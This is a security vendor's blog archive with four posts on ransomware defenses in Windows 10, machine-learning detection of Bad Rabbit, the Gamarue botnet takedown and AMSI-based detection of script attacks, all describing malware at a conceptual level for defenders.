Archive

Archive for the ‘cybersecurity’ Category

A worthy upgrade: Next-gen security on Windows 10 proves resilient against ransomware outbreaks in 2017

January 10th, 2018 No comments

Adopting reliable attack methods and techniques borrowed from more evolved threat types, ransomware attained new levels of reach and damage in 2017. The following trends characterize the ransomware narrative in the past year:

  • Three global outbreaks showed the force of ransomware in making real-world impact, affecting corporate networks and bringing down critical services like hospitals, transportation, and traffic systems
  • Three million unique computers encountered ransomware; millions more saw downloader trojans, exploits, emails, websites and other components of the ransomware kill chain
  • New attack vectors, including compromised supply chain, exploits, phishing emails, and documents taking advantage of the DDE feature in Office were used to deliver ransomware
  • More than 120 new ransomware families, plus countless variants of established families and less prevalent ransomware caught by heuristic and generic detections, emerged from a thriving cybercriminal enterprise powered by ransomware-as-a-service

The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack vectors, makes older platforms so much more susceptible to ransomware attacks. From June to November, Windows 7 devices were 3.4 times more likely to encounter ransomware compared to Windows 10 devices. Considering that Windows 10 has a much larger install base than Windows 7, this difference in ransomware encounter rate is significant.

Figure 1. Ransomware encounter rates on Windows 7 and Windows 10 devices. Encounter rate refers to the percentage of computers running the OS version with Microsoft real-time security that blocked or detected ransomware.

The data shows that attackers are targeting Windows 7. Given todays modern threats, older platforms can be infiltrated more easily because these platforms dont have the advanced built-in end-to-end defense stack available on Windows 10. Continuous enhancements further make Windows 10 more resilient to ransomware and other types of attack.

Windows 10: Multi-layer defense against ransomware attacks

The year 2017 saw three global ransomware outbreaks driven by multiple propagation and infection techniques that are not necessarily new but not typically observed in ransomware. While there are technologies available on Windows 7 to mitigate attacks, Windows 10s comprehensive set of platform mitigations and next-generation technologies cover these attack methods. Additionally, Windows 10 S, which is a configuration of Windows 10 thats streamlined for security and performance, locks down devices against ransomware outbreaks and other threats.

In May, WannaCry (Ransom:Win32/WannaCrypt) caused the first global ransomware outbreak. It used EternalBlue, an exploit for a previously fixed SMBv1 vulnerability, to infect computers and spread across networks at speeds never before observed in ransomware.

On Windows 7, Windows AppLocker and antimalware solutions like Microsoft Security Essentials and System Center Endpoint Protection (SCEP) can block the infection process. However, because WannaCry used an exploit to spread and infect devices, networks with vulnerable Windows 7 devices fell victim. The WannaCry outbreak highlighted the importance of keeping platforms and software up-to-date, especially with critical security patches.

Windows 10 was not at risk from the WannaCry attack. Windows 10 has security technologies that can block the WannaCry ransomware and its spreading mechanism. Built-in exploit mitigations on Windows 10 (KASLR, NX HAL, and PAGE POOL), as well as kCFG (control-flow guard for kernel) and HVCI (kernel code-integrity), make Windows 10 much more difficult to exploit.

Figure 2. Windows 7 and Windows 10 platform defenses against WannaCry

In June, Petya (Ransom:Win32/Petya.B) used the same exploit that gave WannaCry its spreading capabilities, and added more propagation and infection methods to give birth to arguably the most complex ransomware in 2017. Petyas initial infection vector was a compromised software supply chain, but the ransomware quickly spread using the EternalBlue and EternalRomance exploits, as well as a module for lateral movement using stolen credentials.

On Windows 7, Windows AppLocker can stop Petya from infecting the device. If a Windows 7 device is fully patched, Petyas exploitation behavior did not work. However, Petya also stole credentials, which it then used to spread across networks. Once running on a Windows 7 device, only an up-to-date antivirus that had protection in place at zero hour could stop Petya from encrypting files or tampering with the master boot record (MBR).

On the other hand, on Windows 10, Petya had more layers of defenses to overcome. Apart from Windows AppLocker, Windows Defender Application Control can block Petyas entry vector (i.e., compromised software updater running an untrusted binary), as well as the propagation techniques that used untrusted DLLs. Windows 10s built-in exploit mitigations can further protect Windows 10 devices from the Petya exploit. Credential Guard can prevent Petya from stealing credentials from local security authority subsystem service (LSASS), helping curb the ransomwares propagation technique. Meanwhile, Windows Defender System Guard (Secure Boot) can stop the MBR modified by Petya from being loaded at boot time, preventing the ransomware from causing damage to the master file table (MFT).

Figure 3. Windows 7 and Windows 10 platform defenses against Petya

In October, another sophisticated ransomware reared its ugly head: Bad Rabbit ransomware (Ransom:Win32/Tibbar.A) infected devices by posing as an Adobe Flash installer available for download on compromised websites. Similar to WannaCry and Petya, Bad Rabbit had spreading capabilities, albeit more traditional: it used a hardcoded list of user names and passwords. Like Petya, it can also render infected devices unbootable, because, in addition to encrypting files, it also encrypted entire disks.

On Windows 7 devices, several security solutions technologies can block the download and installation of the ransomware, but protecting the device from the damaging payload and from infecting other computers in the network can be tricky.

With Windows 10, however, in addition to stronger defense at the infection vector, corporate networks were safer from this damaging threat because several technologies are available to stop or detect Bad Rabbits attempt to spread across networks using exploits or hardcoded user names and passwords.

More importantly, during the Bad Rabbit outbreak, detonation-based machine learning models in Windows Defender AV cloud protection service, with no human intervention, correctly classified the malware 14 minutes after the very first encounter. The said detonation-based ML models are a part of several layers of machine learning and artificial intelligence technologies that evaluate files in order to reach a verdict on suspected malware. Using this layered approach, Windows Defender AV protected Windows 10 devices with cloud protection enabled from Bad Rabbit within minutes of the outbreak.

Figure 4. Windows 7 and Windows 10 platform defenses against Bad Rabbit

As these outbreaks demonstrated, ransomware has indeed become a highly complex threat that can be expected to continue evolving in 2018 and beyond. The multiple layers of next-generation security technologies on Windows 10 are designed to disrupt the attack methods that we have previously seen in highly specialized malware but now also see in ransomware.

Ransomware protection on Windows 10

For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.

Controlled folder access, however, is but one layer of defense. Ransomware and other threats from the web can be blocked by Microsoft Edge, whose exploit mitigation and sandbox features make it a very secure browser. Microsoft Edge significantly improves web security by using Windows Defender SmartScreens reputation-based blocking of malicious downloads and by opening pages within low-privilege app containers.

Windows Defender Antivirus also continues to enhance defense against threats like ransomware. Its advanced generic and heuristic techniques and layered machine learning models help catch both common and rare ransomware families. Windows Defender AV can detect and block most malware, including never-before-seen ransomware, using generics and heuristics, local ML models, and metadata-based ML models in the cloud. In rare cases that a threat slips past these layers of protection, Windows Defender AV can protect patient zero in real-time using analysis-based ML models, as demonstrated in a real-life case scenario where a customer was protected from a very new Spora ransomware in a matter of seconds. In even rarer cases of inconclusive initial classification, additional automated analysis and ML models can still protect customers within minutes, as what happened during the Bad Rabbit outbreak.

Windows 10 S locks down devices from unauthorized content by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common entry points for ransomware and other threats.

Reducing the attack surface for ransomware and other threats in corporate networks

For enterprises and small businesses, the impact of ransomware is graver. Losing access to files can mean disrupted operations. Big enterprise networks, including critical infrastructures, fell victim to ransomware outbreaks. The modern enterprise network is under constant assault by attackers and needs to be defended on all fronts.

Windows Defender Exploit Guard locks down devices against a wide variety of attack vectors. Its host intrusion prevention capabilities include the following components, which block behaviors commonly used in malware attacks:

  • Attack Surface Reduction (ASR) is a set of controls that blocks common ransomware entry points: Office-, script-, and email-based threats that download and install ransomware; ASR can also protect from emerging exploits like DDEDownloader, which has been used to distribute ransomware
  • Network protection uses Windows Defender SmartScreen to block outbound connections to untrusted hosts, such as when trojan downloaders connect to a malicious server to obtain ransomware payloads
  • Controlled folder access blocks ransomware and other untrusted processes from accessing protected folders and encrypting files in those folders
  • Exploit protection (replacing EMET) provides mitigation against a broad set of exploit techniques that are now being used by ransomware authors

Additionally, the industry-best browser security in Microsoft Edge is enhanced by Windows Defender Application Guard, which brings Azure cloud grade isolation and security segmentation to Windows applications. This hardware isolation-level capability provides one of the highest levels of protection against zero-day exploits, unpatched vulnerabilities, and web-based malware.

For emails, Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers against ransomware attacks that begin with email. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Integrated security for enterprises

Windows Defender Advanced Threat Protection allows SecOps personnel to stop the spread of ransomware through timely detection of ransomware activity in the network. Windows Defender ATPs enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware attack kill-chain, enabling SecOps to promptly investigate and respond to ransomware attacks.

With Windows 10 Fall Creators Update, Windows Defender ATP was expanded to include seamless integration across the entire Windows protection stack, including Windows Defender Exploit Guard, Windows Defender Application Guard, and Windows Defender AV. This integration is designed to provide a single pane of glass for a seamless security management experience.

With all of these security technologies, Microsoft has built the most secure Windows version ever with Windows 10. While the threat landscape will continue to evolve in 2018 and beyond, we dont stop innovating and investing in security solutions that continue to harden Windows 10 against attacks. The twice-per-year feature update release cycle reflects our commitment to innovate and to make it easier to disrupt successful attack techniques with new protection features. Upgrading to Windows 10 not only means decreased risk; it also means access to advanced, multi-layered defense against ransomware and other types of modern attacks.

 

Tanmay Ganacharya (@tanmayg)
Principal Group Manager, Windows Defender Research

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses

December 11th, 2017 No comments

Windows Defender Antivirus uses a layered approach to protection: tiers of advanced automation and machine learning models evaluate files in order to reach a verdict on suspected malware. While Windows Defender AV detects a vast majority of new malware files at first sight, we always strive to further close the gap between malware release and detection.

In a previous blog post, we looked at a real-world case study showing how Windows Defender Antivirus cloud protection service leverages next-gen security technologies to save “patient zero” from new malware threats in real-time. In that case study, a new Spora ransomware variant was analyzed and blocked within seconds using a deep neural network (DNN) machine learning classifier in the cloud. In this blog post well look at how additional automated analysis and machine learning models can further protect customers within minutes in rare cases where initial classification is inconclusive.

Layered machine learning models

In Windows Defender AVs layered approach to defense, if the first layer doesnt detect a threat, we move on to the next level of inspection. As we move down the layers, the amount of time required increases. However, we catch the vast majority of malware at the first (fastest) protection layers and only need to move on to a more sophisticated (but slower) level of inspection for rarer/more advanced threats.

For example, the vast majority of scanned objects are evaluated by the local Windows Defender client machine learning models, behavior-based detection algorithms, generic and heuristic classifications, and more. This helps ensure that users get the best possible performance. In rare cases where local intelligence cant reach a definitive verdict, Windows Defender AV will use the cloud for deeper analysis.

Figure 1. Layered detection model

For a more detailed look at our approach to protection, see The evolution of malware prevention.

Detonation-based machine learning classification

We use a variety of machine learning models that use different algorithms to predict whether a certain file is malware. Some of these algorithms are binary classifiers that give a strict clean-or-malware verdict (0 or 1), while others are multi-class classifiers that provide a probability for each classification (malware, clean, potentially unwanted application, etc). Each machine learning model is trained against a set of different features (often thousands, sometimes hundreds of thousands) to learn to distinguish between different kinds of programs.

For the fastest classifiers in our layered stack, the features may include static attributes of the file combined with events (for example, API calls or behaviors) seen while the scanning engine emulates the file using dynamic translation. If the results from these models are inconclusive, well take an even more in-depth look at what the malware does by actually executing it in a sandbox and observing its run-time behavior. This is known as dynamic analysis, or detonation, and happens automatically whenever we receive a new suspected malware sample.

The activities seen in the sandbox machine (for example, registry changes, file creation/deletion, process injection, network connections, and so forth) are recorded and provided as features to our ML models. These models can then combine both the static features obtained from scanning the file with the dynamic features observed during detonation to arrive at an even stronger prediction.

Figure 2. Detonation-based machine learning classification

Ransom:Win32/Tibbar.A Protection in 14 minutes

On October 24, 2017, in the wake of recent ransomware outbreaks such as Wannacry and NotPetya, news broke of a new threat spreading, primarily in Ukraine and Russia: Ransom:Win32/Tibbar.A (popularly known as Bad Rabbit).

This threat is a good example of how detonation-based machine learning came into play to protect Windows Defender AV customers. First though, lets look at what happened to patient zero.

At 11:17 a.m. local time on October 24, a user running Windows Defender AV in St. Petersburg, Russia was tricked into downloading a file named FlashUtil.exe from a malicious website. Instead of a Flash update, the program was really the just-released Tibbar ransomware.

Windows Defender AV scanned the file and determined that it was suspicious. A query was sent to the cloud protection service, where several metadata-based machine learning models found the file suspicious, but not with a high enough probability to block. The cloud protection service requested that Windows Defender AV client to lock the file, upload it for processing, and wait for a decision.

Within a few seconds the file was processed, and sample-analysis-based ML models returned their conclusions. In this case, a multi-class deep neural network (DNN) machine learning classifier correctly classified the Tibbar sample as malware, but with only an 81.6% probability score. In order to avoid false positives, cloud protection service is configured by default to require at least 90% probability to block the malware (these thresholds are continually evaluated and fine-tuned to find the right balance between blocking malware while avoiding the blocking of legitimate programs). In this case, the ransomware was allowed to run.

Figure 3. Ransom:Win32/Tibbar.A ransom note

Detonation chamber

In the meantime, while patient zero and eight other unfortunate victims (in Ukraine, Russia, Israel, and Bulgaria) contemplated whether to pay the ransom, the sample was detonated and details of the system changes made by the ransomware were recorded.

Figure 4. Sample detonation events used by the machine learning model

As soon as the detonation results were available, a multi-class deep neural network (DNN) classifier that used both static and dynamic features evaluated the results and classified the sample as malware with 90.7% confidence, high enough for the cloud to start blocking.

When a tenth Windows Defender AV customer in the Ukraine was tricked into downloading the ransomware at 11:31 a.m. local time, 14 minutes after the first encounter, cloud protection service used the detonation-based malware classification to immediately block the file and protect the customer.

At this point the cloud protection service had “learned” that this file was malware. It now only required metadata from the client with the hash of the file to issue blocking decisions and protect customers. As the attack gained momentum and began to spread, Windows Defender AV customers with cloud protection enabled were protected. Later, a more specific detection was released to identify the malware as Ransom:Win32/Tibbar.A.

Closing the gap

While we feel good about Windows Defender AV’s layered approach to protection, digging deeper and deeper with automation and machine learning in order to finally reach a verdict on suspected malware, we are continually seeking to close the gap even further between malware release and protection. The cases where we cannot block at first sight are increasingly rare, but there is so much to be done. As our machine learning models are continuously updated and retrained, we are able to make better predictions over time. Yet malware authors will not rest, and the ever-changing threat landscape requires continuous investment in new and better technologies to detect new threats, but also to effectively differentiate the good from the bad.

What about systems that do get infected while detonation and classification are underway? One area that we’re actively investing in is advanced remediation techniques that will let us reach back out to those systems in an organization that were vulnerable and, if possible, get them back to a healthy state.

If you are organization that is willing to accept a higher false positive risk in exchange for stronger protection, you can configure the cloud protection level to tell the Windows Defender AV cloud protection service to take a more aggressive stance towards suspicious files, such as blocking at lower machine learning probability thresholds. In the Tibbar example above, for example, a configuration like this could have protected patient zero using the initial 81% confidence score, and not wait for the higher confidence (detonation-based) result that came later. You can also configure the cloud extended timeout to give the cloud protection service more time to evaluate a first-seen threat.

As another layer of real-time protection against ransomware, enable Controlled folder access, which is one of the features of the new Windows Defender Exploit Guard. Controlled folder access protects files from tampering by locking folders so that ransomware and other unauthorized apps cant access them.

For enterprises, Windows Defender Exploit Guards other features (Attack Surface Reduction, Exploit protection, and Network protection) further protect networks from advanced attacks. Windows Defender Advanced Threat Protection can also alert security operations personnel about malware activities in the network so that personnel can promptly investigate and respond to attacks.

For users running Windows 10 S, malware like Tibbar simply wont run. Windows 10 S provides advanced levels of security by exclusively running apps from the Microsoft Store. Threats such as Tibbar are non-issues for Windows 10 S users. Learn more about Windows 10 S.

New machine learning and AI techniques, in combination with both static and dynamic analysis, gives Windows Defender AV the ability to block more and more malware threats at first sight and, if that fails, learn as quickly as possible that something is bad and start blocking it. Using a layered approach, with different ML models at each layer, gives us the ability to target a wide variety of threats quickly while maintaining low false positive rates. As we gather more data about a potential threat, we can provide predictions with higher and higher confidence and take action accordingly. It is an exciting time to be in the fray.

 

Randy Treit

Senior Security Researcher, Windows Defender Research

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

December 4th, 2017 No comments

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarues sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnets command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnets servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarues global prevalence.

Figure 1. Gamarues global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc
  • Rootkit (included in crime kit) Injects rootkit codes into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) Turns victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer)
  • Teamviewer ($250) Enables attacker to remotely control the victim machine, spy on the desktop, perform file transfer, among other functions
  • Spreader Adds capability to spread Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses Domain Name Generation (DGA) for the servers where it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarues attack kill-chain

Gamarues main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information like the hard disks volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication whether the signed in user has administrative rights, and keyboard language setting for the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazahkstan

Before sending to the C&C server, this information is encrypted with RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue presence in machines.

The reply from the C&C server is also encrypted with RC4 algorithm using the same key used to encrypt the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval in minutes time to wait for when to ask the C2 server for the next command
  • Task ID – used by the hacker to track if there was an error performing the task
  • Command one of the command mentioned above
  • Download URL – from which a plugin/updated binary/other malware can be downloaded depending on the command.

Figure 9. Decrypted reply from C&C server

Anti-sandbox techniques

Gamarue employs anti-AV techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue checks a list hashes of the processes running on a potential victims machine. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. In older versions, a fake payload is manifested when running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating systems of infected computers by disabling Firewall, Windows Update, and User Account Control functions. These functionalities cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn using Gamarue. Since Gamarues main purpose is to distribute other malware, hackers earn using pay-per-install scheme. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developers.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATPs enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email uses built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

 

 

Microsoft Digital Crimes Unit and Windows Defender Research team

 

 

Get more info on the Gamarue (Andromeda) takedown from the following sources:

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that ‘live off the land’

December 4th, 2017 No comments

Data center

Scripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.

Scripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the landstaying away from the disk and using common tools to run code directly in memory. Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of scripts in spam campaigns.

Malicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShellthe de facto scripting standard for administrative tasks on Windowswith the ability to invoke system APIs and access a variety of system classes and objects.

While the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.

Windows 10 provides optics into script behavior through Antimalware Scan Interface (AMSI), a generic, open interface that enables Windows Defender Antivirus to look at script contents the same way script interpreters doin a form that is both unencrypted and unobfuscated. In Windows 10 Fall Creators Update, with knowledge from years analyzing script-based malware, weve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.

This unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection (Windows Defender ATP). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.

In this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP machine learning systems make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.

KRYPTON: Highlighting the resilience of script-based attacks

Traditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.

Apart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.

For example, the activity group KRYPTON has been observed hijacking or creating scheduled tasksthey often target system tasks found in exclusion lists of popular forensic tools like Autoruns for Windows. KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.

To illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by John Lambert and the Office 365 Advanced Threat Protection team.

KRYPTON lure document

Figure 1. KRYPTON lure document

To live off the land, KRYPTON doesnt drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (wscript.exe) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.

KRYPTON script execution chain through wscript.exe

Figure 2. KRYPTON script execution chain through wscript.exe

Exposing actual script behavior with AMSI

AMSI overcomes KRYPTONs evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.

Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

By checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.

Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

PowerShell use by Kovter and other commodity malware

Not only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, Kovter malware uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by wscript.exe) and passed to powershell.exe as an environment variable.

Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

By looking at the PowerShell payload content captured by AMSI, experienced analysts can easily spot similarities to PowerSploit, a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.

Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Fresh machine learning insight with AMSI

While AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.

As outlined in our previous blog, we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.

Process tree augmented by instrumentation for AMSI data

Figure 7. Process tree augmented by instrumentation for AMSI data

As shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (winword.exe) to launch PowerShell (powershell.exe). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware fhjUQ72.tmp, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build expert classifiers for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.

